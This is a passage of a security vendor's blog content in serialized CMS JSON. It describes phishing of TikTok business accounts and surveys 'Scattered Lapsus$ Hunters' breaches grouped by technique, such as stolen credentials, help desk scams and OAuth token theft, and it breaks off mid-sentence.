",{"data":18733,"content":18734,"nodeType":883},{"uri":6923},[18735],{"data":18736,"marks":18737,"value":18739,"nodeType":864},{},[18738],{"type":1455},"reported extensively",{"data":18741,"marks":18742,"value":18743,"nodeType":864},{},[]," about malvertising scams in the past — particularly targeting Google Ad Manager accounts. Attackers take over Ad Manager accounts and use them to deploy even more malicious ads, harvesting account credentials via AITM phishing pages and ClickFix-style malware delivery (dropping infostealers and remote access tools). They also run ",{"data":18745,"content":18746,"nodeType":883},{"uri":9013},[18747],{"data":18748,"marks":18749,"value":18751,"nodeType":864},{},[18750],{"type":1455},"ad fraud campaigns",{"data":18753,"marks":18754,"value":18755,"nodeType":864},{},[]," siphoning company ad budgets into their own pockets. ","Tiktok phishing insight box 1",{"sys":18758,"__typename":18759,"title":18760,"arcadeDemoUrl":18761,"playText":18762},{"id":18266},"ArcadeDemo","Tiktok phishing demo","https://demo.arcade.software/i0NCDltufFhv8xouaTxr?embed","30 secs",{"sys":18764,"__typename":1724,"title":18765,"caption":18765,"layoutMode":59,"file":18766},{"id":18287},"Push example detection timeline showing the initial redirect. In this example Push was configured to Monitor only mode, rather than Block mode.",{"url":18767,"width":18768,"height":18769},"https://images.ctfassets.net/y1cdw1ablpvd/5WAwawK6I0Ez56HE9icvO4/6ad8fedf0c6b72b29b1664ea854593be/image8.png",1802,954,{"sys":18771,"__typename":1724,"title":18772,"caption":18772,"layoutMode":59,"file":18773},{"id":18293},"Initial Cloudflare Turnstile bot check to block security bots from analyzing the page.",{"url":18774,"width":1736,"height":18775},"https://images.ctfassets.net/y1cdw1ablpvd/28rZywTFT0ro4dhWPCfwAJ/6a8342f9bb785db5ed8677939921645d/image6.png",1131,{"sys":18777,"__typename":1724,"title":18778,"caption":18778,"layoutMode":59,"file":18779},{"id":18299},"TikTok for Business themed page.",{"url":18780,"width":1736,"height":8963},"https://images.ctfassets.net/y1cdw1ablpvd/7uoSoE5xwXEBA3tCIOReTX/3e8b06e18097f8625f3edaa92ba770d1/image2.png",{"sys":18782,"__typename":1724,"title":18783,"caption":18783,"layoutMode":59,"file":18784},{"id":18305},"Google Careers themed landing page.",{"url":18785,"width":1736,"height":18786},"https://images.ctfassets.net/y1cdw1ablpvd/5NQmzcYtnsqONZFMljk1Z8/354a8721f4c2195c1aa88b3258a073f1/image1.png",1213,{"sys":18788,"__typename":1724,"title":18789,"caption":18789,"layoutMode":59,"file":18790},{"id":18311},"TikTok for Business themed login page.  The fake page has replaced the “Log in with TikTok” button with “Log in with Google”. ",{"url":18791,"width":1736,"height":18792},"https://images.ctfassets.net/y1cdw1ablpvd/5rDbxr6ZkcbGv2f6opf6TE/c6997fa3fe50426dae17c6578e2c04f1/image4.png",1191,{"sys":18794,"__typename":1724,"title":18795,"caption":18795,"layoutMode":59,"file":18796},{"id":18317},"The TikTok login page has input validation that requires a business email address.",{"url":18797,"width":1736,"height":18798},"https://images.ctfassets.net/y1cdw1ablpvd/1ba6sQzfR3hjeQHyx8zjae/f588da1242c68ea03ee149d489ee272e/image7.png",1127,{"sys":18800,"__typename":1724,"title":18801,"caption":18801,"layoutMode":59,"file":18802},{"id":18323},"Cloned Google login page hosting an AITM phishing kit.",{"url":18803,"width":1736,"height":8963},"https://images.ctfassets.net/y1cdw1ablpvd/6aGrOKJBuwAPalVYgx4P9u/41a456ba585767c6af8637bab392cabf/image5.png",{"sys":18805,"__typename":1717,"type":1718,"ctaText":18806,"buttonLabel":18807,"buttonColour":1721,"buttonUrl":27},{"id":18468},"Learn about the browser attack techniques security teams must contend with in 2026","Get the Report",{"sys":18809,"__typename":1717,"type":1718,"ctaText":18810,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":52},{"id":18706},"Get ahead of the latest browser attacks with our new webinar series, featuring guest experts John Hammond, Troy Hunt, Matt Johansen, and more!",{"items":18812},[],{},"Business TikTok accounts targeted with AITM phishing kits","2026-03-26T00:00:00.000Z",{"items":18817},[18818,19779,20678],{"__typename":2059,"sys":18819,"content":18821,"title":19765,"synopsis":19766,"hashTags":59,"publishedDate":19767,"slug":19768,"tagsCollection":19769,"authorsCollection":19775},{"id":18820},"2sFCww9xnI8okIxhtOaiY1",{"json":18822},{"data":18823,"content":18824,"nodeType":856},{},[18825,18832,18839,18846,18849,18857,18864,18871,18877,18884,18890,18909,18916,18928,18931,18939,18946,18962,18969,18981,18987,18990,18998,19006,19012,19021,19041,19050,19057,19066,19085,19094,19101,19110,19142,19151,19158,19167,19185,19191,19200,19207,19216,19257,19260,19268,19277,19297,19306,19313,19322,19355,19361,19370,19377,19383,19386,19393,19402,19409,19469,19475,19478,19485,19494,19501,19507,19510,19517,19524,19531,19599,19606,19669,19676,19679,19687,19694,19701,19707,19710,19717,19724,19731,19738],{"data":18826,"content":18827,"nodeType":860},{},[18828],{"data":18829,"marks":18830,"value":18831,"nodeType":864},{},[],"The biggest cybersecurity story this year (so far) has been the emergence of “Scattered Lapsus$ Hunters” and their record-breaking worldwide hacking spree. ",{"data":18833,"content":18834,"nodeType":860},{},[18835],{"data":18836,"marks":18837,"value":18838,"nodeType":864},{},[],"Scattered Lapsus$ Hunters is part of “The Com”, the name for the broad community of English-speaking cybercriminals with international criminal connections — including with nation-state sponsored groups. They are also known to collaborate with a range of cybercrime “as-a-Service” organizations for phishing, initial access, ransomware, and more. ",{"data":18840,"content":18841,"nodeType":860},{},[18842],{"data":18843,"marks":18844,"value":18845,"nodeType":864},{},[],"It’s difficult to pin down exactly who the individuals are that make up this criminal collective. But what is known is their MO — making money through extortion by means of account takeover, mass data theft, and ransomware deployment. ",{"data":18847,"content":18848,"nodeType":1005},{},[],{"data":18850,"content":18851,"nodeType":1009},{},[18852],{"data":18853,"marks":18854,"value":18856,"nodeType":864},{},[18855],{"type":899},"How did we get here? ",{"data":18858,"content":18859,"nodeType":860},{},[18860],{"data":18861,"marks":18862,"value":18863,"nodeType":864},{},[],"Earlier this year, the threat group known to most analysts as Scattered Spider (also tracked as 0ktapus, Octo Tempest, Scatter Swine, Muddled Libra, and UNC3944) re-emerged after a series of arrests in late 2024. ",{"data":18865,"content":18866,"nodeType":860},{},[18867],{"data":18868,"marks":18869,"value":18870,"nodeType":864},{},[],"This group has been active in peaks and troughs over the years, but are mainly known for high-profile ransomware attacks on Caesars and MGM Resorts in 2024. ",{"data":18872,"content":18876,"nodeType":996},{"target":18873},{"sys":18874},{"id":18875,"type":1001,"linkType":1002},"1Vt269d7n6IGMzOrJs1FDx",[],{"data":18878,"content":18879,"nodeType":860},{},[18880],{"data":18881,"marks":18882,"value":18883,"nodeType":864},{},[],"Scattered Spider hit the headlines again in April 2025 with attacks on UK retailers Marks & Spencer and Co-op, which resulted in significant, prolonged disruption, and a serious downstream impact on the retail supply chain. ",{"data":18885,"content":18889,"nodeType":996},{"target":18886},{"sys":18887},{"id":18888,"type":1001,"linkType":1002},"3kvcGV2zZZUPnM8IK04Y1O",[],{"data":18891,"content":18892,"nodeType":860},{},[18893,18897,18905],{"data":18894,"marks":18895,"value":18896,"nodeType":864},{},[],"It didn’t stop there, though. What followed was a wide-scale campaign targeting Salesforce customers, with the attackers claiming to have stolen ",{"data":18898,"content":18899,"nodeType":883},{"uri":17177},[18900],{"data":18901,"marks":18902,"value":18904,"nodeType":864},{},[18903],{"type":1455},"over 1.5 billion records from 1000+ companies",{"data":18906,"marks":18907,"value":18908,"nodeType":864},{},[]," across multiple verticals, including heavyweights like Google, Cloudflare, Workday, Adidas, FedEx, Disney, LVMH, and many more.",{"data":18910,"content":18911,"nodeType":860},{},[18912],{"data":18913,"marks":18914,"value":18915,"nodeType":864},{},[],"Around this time, the attackers began to refer to themselves as part of a wider collective, assuming the moniker “Scattered Lapsus$ Hunters” (a mash-up of names given by analysts and self-adopted by attackers — Scattered Spider, ShinyHunters, and Lapsus$).",{"data":18917,"content":18918,"nodeType":860},{},[18919,18923],{"data":18920,"marks":18921,"value":18922,"nodeType":864},{},[],"The most significant breach this year to-date impacted Jaguar Land Rover. A ransomware attack resulted in months of disruption that directly impacted the UK’s GDP, with the government underwriting a $1.5B loan to alleviate the supply chain impact. ",{"data":18924,"marks":18925,"value":18927,"nodeType":864},{},[18926],{"type":899},"In fact, this was the most economically consequential cyber attack yet recorded in a G7 economy. ",{"data":18929,"content":18930,"nodeType":1005},{},[],{"data":18932,"content":18933,"nodeType":1009},{},[18934],{"data":18935,"marks":18936,"value":18938,"nodeType":864},{},[18937],{"type":899},"2025 wasn’t a one-off",{"data":18940,"content":18941,"nodeType":860},{},[18942],{"data":18943,"marks":18944,"value":18945,"nodeType":864},{},[],"The developments through 2025 have presented a stronger picture than ever before that cybercriminal operations are heavily interlinked. Groups overlap considerably, and individuals freely move between different cells. ",{"data":18947,"content":18948,"nodeType":860},{},[18949,18953,18958],{"data":18950,"marks":18951,"value":18952,"nodeType":864},{},[],"When we scratch beneath the surface, this is evident in the tactics, techniques and procedures (TTPs) used by these attackers — even stretching as far back as 2021 with the initial rise of Lapsus$. This is not an accident. ",{"data":18954,"marks":18955,"value":18957,"nodeType":864},{},[18956],{"type":899},"The TTPs used show a conscious move by attackers to move away from environments that are well-protected by traditional security tools. ",{"data":18959,"marks":18960,"value":18961,"nodeType":864},{},[],"This means avoiding targeting endpoints with malware, and not relying on software-based exploits. Instead, these attackers look to take over apps and services directly over the internet. ",{"data":18963,"content":18964,"nodeType":860},{},[18965],{"data":18966,"marks":18967,"value":18968,"nodeType":864},{},[],"Most of the time, this is as simple as logging in to a SaaS app, or an enterprise SSO account (e.g. Microsoft, Okta, or Google) and dumping the data. For attackers that want to take it further, they can abuse the sprawl of interconnected apps that make up modern business IT, seeking out specific data or exploitable functionality. Or, they can leverage internet-accessible management portals to chart a path back to your on-premise assets, giving them everything they need to pivot toward more conventional methods such as ransomware deployment. ",{"data":18970,"content":18971,"nodeType":860},{},[18972,18976],{"data":18973,"marks":18974,"value":18975,"nodeType":864},{},[],"When we look at historical breaches, the pattern is clear. ",{"data":18977,"marks":18978,"value":18980,"nodeType":864},{},[18979],{"type":899},"Not one of the attacks attributed to Scattered Lapsus$ Hunters, or its predecessors, started with an endpoint or network attack — they all began with account takeover. ",{"data":18982,"content":18986,"nodeType":996},{"target":18983},{"sys":18984},{"id":18985,"type":1001,"linkType":1002},"6poP5VM2ARrEvwKEG42HgK",[],{"data":18988,"content":18989,"nodeType":1005},{},[],{"data":18991,"content":18992,"nodeType":1009},{},[18993],{"data":18994,"marks":18995,"value":18997,"nodeType":864},{},[18996],{"type":899},"TTP breakdown: Analyzing the top “Scattered Lapsus$ Hunters” breaches since 2021",{"data":18999,"content":19000,"nodeType":1312},{},[19001],{"data":19002,"marks":19003,"value":19005,"nodeType":864},{},[19004],{"type":899},"Phishing and stolen credentials",{"data":19007,"content":19011,"nodeType":996},{"target":19008},{"sys":19009},{"id":19010,"type":1001,"linkType":1002},"4SNOanDIdGZsvRRnMYQVSo",[],{"data":19013,"content":19014,"nodeType":860},{},[19015],{"data":19016,"marks":19017,"value":19020,"nodeType":864},{},[19018,19019],{"type":899},{"type":1455},"EA Games (2021)",{"data":19022,"content":19023,"nodeType":860},{},[19024,19028,19037],{"data":19025,"marks":19026,"value":19027,"nodeType":864},{},[],"Attackers used stolen session cookies to log into EA’s Slack instance, purchased on a criminal forum. Combined with ",{"data":19029,"content":19031,"nodeType":883},{"uri":19030},"https://pushsecurity.com/blog/phishing-slack-persistence/",[19032],{"data":19033,"marks":19034,"value":19036,"nodeType":864},{},[19035],{"type":1455},"social engineering via Slack",{"data":19038,"marks":19039,"value":19040,"nodeType":864},{},[],", this was used to steal 750GB of data, including video game source code. ",{"data":19042,"content":19043,"nodeType":860},{},[19044],{"data":19045,"marks":19046,"value":19049,"nodeType":864},{},[19047,19048],{"type":899},{"type":1455},"Nvidia (2022)",{"data":19051,"content":19052,"nodeType":860},{},[19053],{"data":19054,"marks":19055,"value":19056,"nodeType":864},{},[],"Attackers used stolen credentials to steal 1TB of data from Nvidia’s internal shares, including a significant amount of sensitive information about the designs of Nvidia graphics cards, source code, and the usernames and passwords of more than 71,000 Nvidia employees.",{"data":19058,"content":19059,"nodeType":860},{},[19060],{"data":19061,"marks":19062,"value":19065,"nodeType":864},{},[19063,19064],{"type":899},{"type":1455},"Microsoft (2022)",{"data":19067,"content":19068,"nodeType":860},{},[19069,19073,19081],{"data":19070,"marks":19071,"value":19072,"nodeType":864},{},[],"Attackers used stolen credentials combined with SIM swapping and ",{"data":19074,"content":19076,"nodeType":883},{"uri":19075},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/mfa_fatigue/description.md",[19077],{"data":19078,"marks":19079,"value":19080,"nodeType":864},{},[],"MFA fatigue",{"data":19082,"marks":19083,"value":19084,"nodeType":864},{},[]," attacks to steal Azure DevOps source code — leaked a 9GB archive of Microsoft source code – including ~90% of Bing and 45% of Cortana code. ",{"data":19086,"content":19087,"nodeType":860},{},[19088],{"data":19089,"marks":19090,"value":19093,"nodeType":864},{},[19091,19092],{"type":899},{"type":1455},"T-Mobile (2022)",{"data":19095,"content":19096,"nodeType":860},{},[19097],{"data":19098,"marks":19099,"value":19100,"nodeType":864},{},[],"Attackers used stolen credentials to establish initial access, coupled with social engineering T-Mobile staff into approving the attacker’s device for VPN access. This resulted in source code being stolen from over 30,000 repositories. ",{"data":19102,"content":19103,"nodeType":860},{},[19104],{"data":19105,"marks":19106,"value":19109,"nodeType":864},{},[19107,19108],{"type":899},{"type":1455},"Snowflake (165 customers) (2024)",{"data":19111,"content":19112,"nodeType":860},{},[19113,19117,19125,19129,19138],{"data":19114,"marks":19115,"value":19116,"nodeType":864},{},[],"Attackers targeted ",{"data":19118,"content":19119,"nodeType":883},{"uri":3751},[19120],{"data":19121,"marks":19122,"value":19124,"nodeType":864},{},[19123],{"type":1455},"165 Snowflake customers",{"data":19126,"marks":19127,"value":19128,"nodeType":864},{},[]," using stolen credentials from credential breaches dating back as far as 2020. Due to widespread MFA gaps and the presence of ",{"data":19130,"content":19132,"nodeType":883},{"uri":19131},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/ghost_logins/description.md",[19133],{"data":19134,"marks":19135,"value":19137,"nodeType":864},{},[19136],{"type":1455},"ghost logins",{"data":19139,"marks":19140,"value":19141,"nodeType":864},{},[],", attackers were able to simply log in to individual customer tenants, dump the data, and use it to extort the companies. In total, 9 public victims were named following the breach, with over 1B breached customer records. ",{"data":19143,"content":19144,"nodeType":860},{},[19145],{"data":19146,"marks":19147,"value":19150,"nodeType":864},{},[19148,19149],{"type":899},{"type":1455},"PowerSchool (2024)",{"data":19152,"content":19153,"nodeType":860},{},[19154],{"data":19155,"marks":19156,"value":19157,"nodeType":864},{},[],"Attackers gained access to a community-focused customer support portal, PowerSource, using compromised credentials and stole data using an \"export data manager\" customer support tool, stealing the data of 62.4 million students and 9.5 million teachers. PowerSchool paid an undisclosed ransom fee, but hackers returned later to extort schools and individuals separately anyway.",{"data":19159,"content":19160,"nodeType":860},{},[19161],{"data":19162,"marks":19163,"value":19166,"nodeType":864},{},[19164,19165],{"type":899},{"type":1455},"Red Hat (2025)",{"data":19168,"content":19169,"nodeType":860},{},[19170,19174,19181],{"data":19171,"marks":19172,"value":19173,"nodeType":864},{},[],"Attackers breached Red Hat’s GitLab instance via a compromised account — the result of ",{"data":19175,"content":19176,"nodeType":883},{"uri":19131},[19177],{"data":19178,"marks":19179,"value":19137,"nodeType":864},{},[19180],{"type":1455},{"data":19182,"marks":19183,"value":19184,"nodeType":864},{},[]," providing a backdoor to access an otherwise secure, SSO-connected account. Stolen data included approximately 800 Customer Engagement Reports (CERs), authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure. ",{"data":19186,"content":19190,"nodeType":996},{"target":19187},{"sys":19188},{"id":19189,"type":1001,"linkType":1002},"G1V7d5Dvevmr9p0YXElPX",[],{"data":19192,"content":19193,"nodeType":860},{},[19194],{"data":19195,"marks":19196,"value":19199,"nodeType":864},{},[19197,19198],{"type":899},{"type":1455},"Discord (2025)",{"data":19201,"content":19202,"nodeType":860},{},[19203],{"data":19204,"marks":19205,"value":19206,"nodeType":864},{},[],"Attackers compromised a Zendesk customer support account, stealing 1.6TB of data. The hackers say this consisted of roughly 8.4 million tickets affecting 5.5 million unique users, and that about 580,000 users contained payment information.",{"data":19208,"content":19209,"nodeType":860},{},[19210],{"data":19211,"marks":19212,"value":19215,"nodeType":864},{},[19213,19214],{"type":899},{"type":1455},"SoundCloud, MatchGroup, Crunchbase, Betterment... (2026)",{"data":19217,"content":19218,"nodeType":860},{},[19219,19223,19231,19234,19242,19246,19253],{"data":19220,"marks":19221,"value":19222,"nodeType":864},{},[],"Scattered Lapsus$ Hunters have already claimed several public victims in 2026, with over 60 million breached records. ",{"data":19224,"content":19226,"nodeType":883},{"uri":19225},"https://www.bleepingcomputer.com/news/security/shinyhunters-claim-to-be-behind-sso-account-data-theft-attacks/",[19227],{"data":19228,"marks":19229,"value":19230,"nodeType":864},{},[],"SoundCloud, Betterment, Crunchbase",{"data":19232,"marks":19233,"value":902,"nodeType":864},{},[],{"data":19235,"content":19237,"nodeType":883},{"uri":19236},"https://www.bleepingcomputer.com/news/security/match-group-breach-exposes-data-from-hinge-tinder-okcupid-and-match/",[19238],{"data":19239,"marks":19240,"value":19241,"nodeType":864},{},[],"MatchGroup",{"data":19243,"marks":19244,"value":19245,"nodeType":864},{},[]," have all reported breaches this month, powered by a brand ",{"data":19247,"content":19248,"nodeType":883},{"uri":6259},[19249],{"data":19250,"marks":19251,"value":19252,"nodeType":864},{},[],"new real-time-operated AiTM phishing kit",{"data":19254,"marks":19255,"value":19256,"nodeType":864},{},[]," targeting Okta, Entra, and Google SSO accounts. This is a developing situation, with more victims expected to be announced publicly soon.",{"data":19258,"content":19259,"nodeType":1005},{},[],{"data":19261,"content":19262,"nodeType":1312},{},[19263],{"data":19264,"marks":19265,"value":19267,"nodeType":864},{},[19266],{"type":899},"Vishing and help desk scams",{"data":19269,"content":19270,"nodeType":860},{},[19271],{"data":19272,"marks":19273,"value":19276,"nodeType":864},{},[19274,19275],{"type":899},{"type":1455},"MGM Resorts & Caesars (2023)",{"data":19278,"content":19279,"nodeType":860},{},[19280,19284,19293],{"data":19281,"marks":19282,"value":19283,"nodeType":864},{},[],"MGM Resorts and Caesars were hit with twin breaches in 2023. Attackers socially engineered help desk personnel to take over accounts with Super Administrator privileges within MGM Resorts’ Okta tenant, which they then used to register a second, attacker-controlled IdP via ",{"data":19285,"content":19287,"nodeType":883},{"uri":19286},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/inbound_federation/description.md",[19288],{"data":19289,"marks":19290,"value":19292,"nodeType":864},{},[19291],{"type":1455},"inbound federation",{"data":19294,"marks":19295,"value":19296,"nodeType":864},{},[]," — granting comprehensive access that was used to deploy ransomware. ",{"data":19298,"content":19299,"nodeType":860},{},[19300],{"data":19301,"marks":19302,"value":19305,"nodeType":864},{},[19303,19304],{"type":899},{"type":1455},"Transport for London (2024)",{"data":19307,"content":19308,"nodeType":860},{},[19309],{"data":19310,"marks":19311,"value":19312,"nodeType":864},{},[],"Attackers socially engineered the Transport for London help desk to gain privileged access to the IT environment, resulting in prolonged disruption to key online services underpinning London’s public transport network, theft of 5,000 users bank details, and all 30,000 staff members having to reset their online credentials in person.",{"data":19314,"content":19315,"nodeType":860},{},[19316],{"data":19317,"marks":19318,"value":19321,"nodeType":864},{},[19319,19320],{"type":899},{"type":1455},"Marks & Spencer (2025)",{"data":19323,"content":19324,"nodeType":860},{},[19325,19329,19338,19342,19351],{"data":19326,"marks":19327,"value":19328,"nodeType":864},{},[],"Attackers compromised a Microsoft Entra account belonging to a privileged user via a ",{"data":19330,"content":19332,"nodeType":883},{"uri":19331},"https://pushsecurity.com/blog/scattered-spider-defending-against-help-desk-scams/",[19333],{"data":19334,"marks":19335,"value":19337,"nodeType":864},{},[19336],{"type":1455},"help desk scam",{"data":19339,"marks":19340,"value":19341,"nodeType":864},{},[],", which enabled them to steal sensitive data from cloud environments, as well as pivot to deploy ransomware via the ",{"data":19343,"content":19345,"nodeType":883},{"uri":19344},"https://cloud.google.com/blog/topics/threat-intelligence/vsphere-active-directory-integration-risks",[19346],{"data":19347,"marks":19348,"value":19350,"nodeType":864},{},[19349],{"type":1455},"VMware admin console",{"data":19352,"marks":19353,"value":19354,"nodeType":864},{},[],". This enabled ransomware to be deployed at the hypervisor layer, evading host-based protections like EDR. ",{"data":19356,"content":19360,"nodeType":996},{"target":19357},{"sys":19358},{"id":19359,"type":1001,"linkType":1002},"7hBdHG74NaA3bQfOMpYA9o",[],{"data":19362,"content":19363,"nodeType":860},{},[19364],{"data":19365,"marks":19366,"value":19369,"nodeType":864},{},[19367,19368],{"type":899},{"type":1455},"Jaguar Land Rover (2025)",{"data":19371,"content":19372,"nodeType":860},{},[19373],{"data":19374,"marks":19375,"value":19376,"nodeType":864},{},[],"Attackers compromised highly privileged admin accounts via a help desk scam, which they leveraged to access and deploy ransomware to all aspects of Jaguar’s business, from CAD and engineering software, to payments tracking, to customer car delivery, using similar techniques to the Marks & Spencer breach. ",{"data":19378,"content":19382,"nodeType":996},{"target":19379},{"sys":19380},{"id":19381,"type":1001,"linkType":1002},"6s1X2fo4K9EeVLBmHm4YXb",[],{"data":19384,"content":19385,"nodeType":1005},{},[],{"data":19387,"content":19388,"nodeType":1312},{},[19389],{"data":19390,"marks":19391,"value":694,"nodeType":864},{},[19392],{"type":899},{"data":19394,"content":19395,"nodeType":860},{},[19396],{"data":19397,"marks":19398,"value":19401,"nodeType":864},{},[19399,19400],{"type":899},{"type":1455},"Salesforce & Salesloft (1000+ customers) (2025)",{"data":19403,"content":19404,"nodeType":860},{},[19405],{"data":19406,"marks":19407,"value":19408,"nodeType":864},{},[],"A vast campaign against Salesforce customers resulted in the compromise of 1000+ Salesforce tenants (according to the attacker) with more than 1.5 billion records stolen. This campaign can consisted of three phases:",{"data":19410,"content":19411,"nodeType":941},{},[19412,19427,19442],{"data":19413,"content":19414,"nodeType":945},{},[19415],{"data":19416,"content":19417,"nodeType":860},{},[19418,19423],{"data":19419,"marks":19420,"value":19422,"nodeType":864},{},[19421],{"type":899},"Phase 1:",{"data":19424,"marks":19425,"value":19426,"nodeType":864},{},[]," The attacker conducted a large-scale vishing campaign against Salesforce customers, calling up users and socially engineering them into connecting a malicious version of the “Data Loader” app into their tenant. This was in fact an attacker-controlled app that enabled data to be mass-exfiltrated via API. ",{"data":19428,"content":19429,"nodeType":945},{},[19430],{"data":19431,"content":19432,"nodeType":860},{},[19433,19438],{"data":19434,"marks":19435,"value":19437,"nodeType":864},{},[19436],{"type":899},"Phase 2: ",{"data":19439,"marks":19440,"value":19441,"nodeType":864},{},[],"The attacker conducted a supply-chain compromise against customers of Salesloft. Users of Salesloft’s “Drift” integration were impacted by attackers stealing access tokens from Salesloft’s AWS environment. This integration allowed the attacker to steal data from customers that had deployed Drift to connected environments — namely, Salesforce, and Google Workspace. ",{"data":19443,"content":19444,"nodeType":945},{},[19445],{"data":19446,"content":19447,"nodeType":860},{},[19448,19453,19457,19465],{"data":19449,"marks":19450,"value":19452,"nodeType":864},{},[19451],{"type":899},"Phase 3:",{"data":19454,"marks":19455,"value":19456,"nodeType":864},{},[]," The attacker then conducted a separate supply-chain compromise involving Gainsight (allegedly using OAuth tokens stolen in the Salesloft attack) which enabled them to ",{"data":19458,"content":19460,"nodeType":883},{"uri":19459},"https://www.bleepingcomputer.com/news/security/salesforce-investigates-customer-data-theft-via-gainsight-breach/",[19461],{"data":19462,"marks":19463,"value":19464,"nodeType":864},{},[],"breach a further 285 Salesforce instances",{"data":19466,"marks":19467,"value":19468,"nodeType":864},{},[]," using stolen OAuth tokens from Gainsight's integrations. ",{"data":19470,"content":19474,"nodeType":996},{"target":19471},{"sys":19472},{"id":19473,"type":1001,"linkType":1002},"3TwjpVKQ42SwQRhvGFbZdn",[],{"data":19476,"content":19477,"nodeType":1005},{},[],{"data":19479,"content":19480,"nodeType":1312},{},[19481],{"data":19482,"marks":19483,"value":699,"nodeType":864},{},[19484],{"type":899},{"data":19486,"content":19487,"nodeType":860},{},[19488],{"data":19489,"marks":19490,"value":19493,"nodeType":864},{},[19491,19492],{"type":899},{"type":1455},"CyberHaven (2024)",{"data":19495,"content":19496,"nodeType":860},{},[19497],{"data":19498,"marks":19499,"value":19500,"nodeType":864},{},[],"Hackers phished a CyberHaven extension developer and uploaded a malicious version of the CyberHaven extension to the Chrome Web Store, leading to customer data breaches where installed in user browsers, impacting CyberHaven’s estimated ~400 business customers. This was part of a broader campaign that targeted 35 Chrome extensions, collectively impacting over 2.5 million users.",{"data":19502,"content":19506,"nodeType":996},{"target":19503},{"sys":19504},{"id":19505,"type":1001,"linkType":1002},"4ErDI0xi0Vj2Zrk8Qsb2NB",[],{"data":19508,"content":19509,"nodeType":1005},{},[],{"data":19511,"content":19512,"nodeType":1009},{},[19513],{"data":19514,"marks":19515,"value":5520,"nodeType":864},{},[19516],{"type":899},{"data":19518,"content":19519,"nodeType":860},{},[19520],{"data":19521,"marks":19522,"value":19523,"nodeType":864},{},[],"Scattered Lapsus$ Hunters are dominating the headlines right now, but they aren’t the only attackers using these modern techniques and consciously evading established security controls. ",{"data":19525,"content":19526,"nodeType":860},{},[19527],{"data":19528,"marks":19529,"value":19530,"nodeType":864},{},[],"Threat reports agree that attackers are steering away from traditional exploit and malware-driven breaches towards identities:",{"data":19532,"content":19533,"nodeType":941},{},[19534,19555,19577],{"data":19535,"content":19536,"nodeType":945},{},[19537],{"data":19538,"content":19539,"nodeType":860},{},[19540,19544,19552],{"data":19541,"marks":19542,"value":19543,"nodeType":864},{},[],"Identity-based attacks surged 32% in the last year, while 97% of identity attacks are password-based, driven by credential leaks and infostealer malware. (",{"data":19545,"content":19547,"nodeType":883},{"uri":19546},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1",[19548],{"data":19549,"marks":19550,"value":13585,"nodeType":864},{},[19551],{"type":1455},{"data":19553,"marks":19554,"value":10724,"nodeType":864},{},[],{"data":19556,"content":19557,"nodeType":945},{},[19558],{"data":19559,"content":19560,"nodeType":860},{},[19561,19565,19574],{"data":19562,"marks":19563,"value":19564,"nodeType":864},{},[],"79% of detections were malware-free in the last year, up from 40% in 2019. (",{"data":19566,"content":19568,"nodeType":883},{"uri":19567},"https://www.crowdstrike.com/en-gb/global-threat-report/",[19569],{"data":19570,"marks":19571,"value":19573,"nodeType":864},{},[19572],{"type":1455},"CrowdStrike",{"data":19575,"marks":19576,"value":10724,"nodeType":864},{},[],{"data":19578,"content":19579,"nodeType":945},{},[19580],{"data":19581,"content":19582,"nodeType":860},{},[19583,19587,19596],{"data":19584,"marks":19585,"value":19586,"nodeType":864},{},[],"Credential abuse and phishing combined accounted for 38% of breaches, making identity the primary breach vector observed. (",{"data":19588,"content":19590,"nodeType":883},{"uri":19589},"https://www.verizon.com/business/resources/reports/dbir/",[19591],{"data":19592,"marks":19593,"value":19595,"nodeType":864},{},[19594],{"type":1455},"Verizon",{"data":19597,"marks":19598,"value":10724,"nodeType":864},{},[],{"data":19600,"content":19601,"nodeType":860},{},[19602],{"data":19603,"marks":19604,"value":19605,"nodeType":864},{},[],"And other public breaches from this year alone demonstrate similar TTPs from outside of the Scattered Lapsus$ Hunters orbit:",{"data":19607,"content":19608,"nodeType":941},{},[19609,19624,19639,19654],{"data":19610,"content":19611,"nodeType":945},{},[19612],{"data":19613,"content":19614,"nodeType":860},{},[19615,19620],{"data":19616,"marks":19617,"value":19619,"nodeType":864},{},[19618],{"type":899},"Nikkei",{"data":19621,"marks":19622,"value":19623,"nodeType":864},{},[],": Japanese publishing giant Nikkei’s Slack messaging platform was compromised using stolen credentials, leaking the names, email addresses, and chat histories for 17,368 individuals registered on Slack.",{"data":19625,"content":19626,"nodeType":945},{},[19627],{"data":19628,"content":19629,"nodeType":860},{},[19630,19635],{"data":19631,"marks":19632,"value":19634,"nodeType":864},{},[19633],{"type":899},"Evertec",{"data":19636,"marks":19637,"value":19638,"nodeType":864},{},[],": Hackers tried to steal $130 million from Evertec’s Brazilian subsidiary Sinqia S.A.after gaining unauthorized access to its environment on the central bank’s real-time payment system (Pix) using stolen credentials.",{"data":19640,"content":19641,"nodeType":945},{},[19642],{"data":19643,"content":19644,"nodeType":860},{},[19645,19650],{"data":19646,"marks":19647,"value":19649,"nodeType":864},{},[19648],{"type":899},"Hy-Vee:",{"data":19651,"marks":19652,"value":19653,"nodeType":864},{},[]," Was hit with a data breach after hackers logged in with stolen credentials, exposing 53GB of sensitive data.",{"data":19655,"content":19656,"nodeType":945},{},[19657],{"data":19658,"content":19659,"nodeType":860},{},[19660,19665],{"data":19661,"marks":19662,"value":19664,"nodeType":864},{},[19663],{"type":899},"Scania: ",{"data":19666,"marks":19667,"value":19668,"nodeType":864},{},[],"Automotive giant Scania confirmed it suffered a cybersecurity incident where threat actors used compromised credentials to breach its Financial Services systems and steal insurance claim documents.",{"data":19670,"content":19671,"nodeType":860},{},[19672],{"data":19673,"marks":19674,"value":19675,"nodeType":864},{},[],"Scattered Lapsus$ Hunters may be grabbing the headlines — but this a huge movement in a vast and flexible community of attackers. And criminals around the world are learning from their success. ",{"data":19677,"content":19678,"nodeType":1005},{},[],{"data":19680,"content":19681,"nodeType":1009},{},[19682],{"data":19683,"marks":19684,"value":19686,"nodeType":864},{},[19685],{"type":899},"Lessons learned",{"data":19688,"content":19689,"nodeType":860},{},[19690],{"data":19691,"marks":19692,"value":19693,"nodeType":864},{},[],"The common thread with all of these attacks is that they are evading established security controls by targeting applications directly, over the internet, via account 